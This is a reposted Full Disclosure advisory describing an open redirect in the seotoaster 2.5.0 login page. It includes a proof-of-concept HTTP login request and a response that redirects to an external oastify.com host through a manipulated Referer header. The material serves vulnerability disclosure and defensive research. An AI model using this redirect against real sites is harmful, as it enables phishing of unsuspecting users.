Open Redirect "Login Page" Functionality - seotoasterv2.5.0
Open Redirect漏洞存在于seotoasterv2.5.0中,攻击者可通过设置Referer头中的恶意域名,在用户登录后重定向至攻击者控制的页面,可能导致钓鱼或其他攻击行为。 2025-7-30 02:48:20 Author: seclists.org(查看原文) 阅读量:21 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 20 Jul 2025 15:46:55 +0100

# Exploit Title: Open Redirect "Login Page" Functionality - seotoasterv2.5.0
# Date: 07/2025
# Exploit Author: Andrey Stoykov
# Version: 2.5.0
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Open Redirect "Login Page" Functionality #1:

Steps to Reproduce

Login to the application and then add the Referer header to attacker domain


// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0)
Gecko/20100101 Firefox/141.0
[...]

email=admin%40example.com
&password=Pasw0rd%21&submit=Let+me+in&secureToken=f3a4d32c75942f7f284ae9189e21d431


// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 13:55:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Location: http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • Open Redirect "Login Page" Functionality - seotoasterv2.5.0 Andrey Stoykov (Jul 29)

文章来源: https://seclists.org/fulldisclosure/2025/Jul/23
如有侵权请联系:admin#unsafe.sh